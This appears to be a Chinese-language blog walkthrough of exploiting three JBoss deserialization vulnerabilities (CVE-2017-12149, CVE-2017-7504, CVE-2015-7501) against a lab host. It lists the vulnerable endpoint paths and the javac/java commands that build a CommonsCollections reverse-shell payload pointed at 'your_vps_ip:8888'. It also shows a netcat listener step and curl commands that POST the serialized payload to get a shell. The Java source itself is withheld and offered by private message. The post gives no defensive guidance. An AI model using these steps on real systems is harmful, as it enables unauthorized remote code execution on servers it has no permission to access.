JBOSS AS 6.x反序列化(CVE-2017-12149)
漏洞影响5.x和6.x版本的JBOSSAS
1、检测目录 192.168.28.138:60899/invoker/readonly
![30ff0a8e294e99aef5e1ee0be22906a0.png](https://i-blog.csdnimg.cn/blog_migrate/aa71574438d28a8a2bb3f29551c608fb.jpeg)
2、Linux下编译java代码,然后生成反弹shell序列化文件,内容较长,可私信“jboss”获取代码
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.javajava -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap your_vps_ip:8888
![e57da2ba1280c4a8c993155961203469.png](https://i-blog.csdnimg.cn/blog_migrate/7b76bc14edb92e626ef921e6041c3c9a.jpeg)
3、nc监听上述反弹shell端口
![12bf7aaf300ac15f01807dc3681754a1.png](https://i-blog.csdnimg.cn/blog_migrate/948a58cd54c8d7b0ea566fb7355a32fd.jpeg)
4、向目标发送生成的序列化文件即可收到反弹shell
curl http://192.168.28.138:60899/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
![9149fc0725b8b224eb33b7150d2a1d33.png](https://i-blog.csdnimg.cn/blog_migrate/7468ad0df827c8166715a8178a0eb607.jpeg)
5、接收反弹shell
![9f01f1f75a05e3d423144380207847bc.png](https://i-blog.csdnimg.cn/blog_migrate/bd9e849bc41fba79a96ab20a12badb06.jpeg)
JBOSS AS 4.x JbossMQ JMS反序列化(CVE-2017-7504)
影响范围:JBoss AS 4.x及之前版本。跟CVE-2017-12149使用同样的payload
1、检测目录192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet
![ceb546e4d936bbfeece117d3cdc15c18.png](https://i-blog.csdnimg.cn/blog_migrate/0b820a76ffd7a2fc5ec818f29f39e1d6.jpeg)
2、nc监听
![faeb89f85d6e5c5c63110bf01df3f4b5.png](https://i-blog.csdnimg.cn/blog_migrate/c4320e6a8e60093c0c09a5d2d05bf7d5.jpeg)
3、发送payload getshell
curl http://192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
![fcdefe5bbfb4edeeb309bc29d73ee7aa.png](https://i-blog.csdnimg.cn/blog_migrate/011012fcca87b0f3f230ba8cd0e7eba7.jpeg)
4、接收反弹shell
![2ee3612ddf3c528d9c473d21f3f27c42.png](https://i-blog.csdnimg.cn/blog_migrate/2b2fbc1d30f62e37d9526c64fad1d44f.jpeg)
JBOSS Java反序列化(CVE-2015-7501)
也就是15年出来的Java反序列化漏洞
![e0b30f54923e5977399a6e738493a94d.png](https://i-blog.csdnimg.cn/blog_migrate/3162fb01f65026d116f040107efdb707.jpeg)
1、检测目录192.168.28.138:57287/invoker/JMXInvokerServlet
2、直接利用Java反序列化工具即可
![b2a7889c3a6f0c74922de81df692cac2.png](https://i-blog.csdnimg.cn/blog_migrate/1863fbbe316c85ccc153d5cabd1baadc.jpeg)
私信“jboss”获取利用代码及工具。